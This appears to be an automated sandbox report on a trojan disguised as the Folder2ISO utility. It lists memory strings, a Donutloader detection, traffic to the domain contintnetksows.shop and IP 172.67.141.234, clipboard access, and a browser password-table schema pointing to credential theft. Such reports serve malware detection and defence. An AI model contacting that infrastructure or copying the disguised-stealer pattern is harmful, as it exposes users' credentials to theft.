              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/apien0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/apieppgd
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/apih
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/apin
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/apirofi
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/apiz
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/e
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/p
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/p1
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/pp
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/s
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/s8
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop:443/api
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop:443/api)
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop:443/apiK
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop:443/api_storageCJ
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 6RVmzn1DzL.exe | String found in binary or memory: https://github.com/imgdrive/Folder2ISO
              Source: 6RVmzn1DzL.exe | String found in binary or memory: https://github.com/imgdrive/Folder2ISO/issues
              Source: 6RVmzn1DzL.exe | String found in binary or memory: https://github.com/imgdrive/Folder2ISOhttps://github.com/imgdrive/Folder2ISO/issuesVIDEO_TSBDMVBDAVA
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: 6RVmzn1DzL.exe | String found in binary or memory: https://www.ssl.com/repository0
              Source: 6RVmzn1DzL.exe | String found in binary or memory: https://www.yubsoft.com
              Source: 6RVmzn1DzL.exe | String found in binary or memory: https://www.yubsoft.com%dshell32.dllSHGetDesktopFolderSHCreateShellItem
              Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031FE780 OpenClipboard, GetWindowLongW, GetClipboardData, GlobalFix, GlobalUnWire, CloseClipboard

              System Summary

              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DE0CB6 NtCreateSection, NtMapViewOfSection, VirtualAlloc, NtMapViewOfSection, VirtualProtect, VirtualProtect, VirtualProtect
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623E41
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623869
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006240F9
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006230B5
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0062388D
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0062616B
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0062B936
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0063E1F6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006231AA
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623222
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006232F0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006402D6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623291
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00624B77
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623B5D
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0062D332
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623304
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623B16
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623CA3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0063DC84
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00632C9C
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623570
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623547
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623D2B
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623506
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623599
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00626645
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00623611
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006326D4
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0062CF66
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0063E768
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00639F7E
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0063EF10
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0062D71C
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00622F93
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D904C7
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DE0CB6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DB935C
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D95343
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D90000
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DC8193
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DA11B3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D971B3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D9A693
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D966A3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D98403
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DCD593
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D99A63
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DCD8B3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DB6853
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DB2993
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D97EE3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02DC4F53
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031F1020
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031D4D30
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031D80F0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031D6570
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_032035E0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031D6A90
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031D39D0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031F79E9
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_03206820
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031D5840
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031DF840
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0320BF40
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031F4EE0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031D8D20
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0320BC20
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 0063162F appears 36 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 031DF9C0 appears 162 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 00632FF0 appears 40 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 02DA1333 appears 161 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 02D9A493 appears 69 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 031D8B20 appears 70 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 00640E7D appears 31 times
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1728
Source: 6RVmzn1DzL.exe | Static PE information: invalid certificate
Source: 6RVmzn1DzL.exe, 00000000.00000003.2103088189.00000000032D3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefolder2iso.exe0 vs 6RVmzn1DzL.exe
Source: 6RVmzn1DzL.exe | Binary or memory string: OriginalFilenamefolder2iso.exe0 vs 6RVmzn1DzL.exe
Source: 6RVmzn1DzL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D90BD7 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,FindCloseChangeNotification
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3276
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f991d166-a1fc-4b2d-8540-b78852e4b9a6
Source: 6RVmzn1DzL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134411528.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2148025189.00000000012CD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 6RVmzn1DzL.exe | ReversingLabs: Detection: 18%
Source: 6RVmzn1DzL.exe | Virustotal: Detection: 18%
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | File read: C:\Users\user\Desktop\6RVmzn1DzL.exe
Source: unknown | Process created: C:\Users\user\Desktop\6RVmzn1DzL.exe "C:\Users\user\Desktop\6RVmzn1DzL.exe"
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1728
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Section loaded: ondemandconnroutehelper.dll
Source: 6RVmzn1DzL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 6RVmzn1DzL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 6RVmzn1DzL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 6RVmzn1DzL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 6RVmzn1DzL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 6RVmzn1DzL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 6RVmzn1DzL.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 6RVmzn1DzL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: folder2iso.pdb source: 6RVmzn1DzL.exe
Source: 6RVmzn1DzL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 6RVmzn1DzL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 6RVmzn1DzL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 6RVmzn1DzL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 6RVmzn1DzL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00633035 push ecx; ret 0_2_00633048
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006315E8 push ecx; ret 0_2_006315FB
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00621DB1 SetDlgItemTextW,GetPrivateProfileStringW,SHGetFolderPathW,lstrlenW
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006220BD IsIconic,ShowWindow,DragQueryFileW,DragFinish
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006229E6 ShowWindow,ShowWindow,IsIconic,ShowWindow,SetForegroundWindow,GetCommandLineW,lstrlenW,LocalAlloc,GetCurrentDirectoryW,lstrcpyW,SendMessageW,LocalFree
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00622775 lstrlenW,CommandLineToArgvW,GlobalFree,IsIconic,ShowWindow,SetForegroundWindow
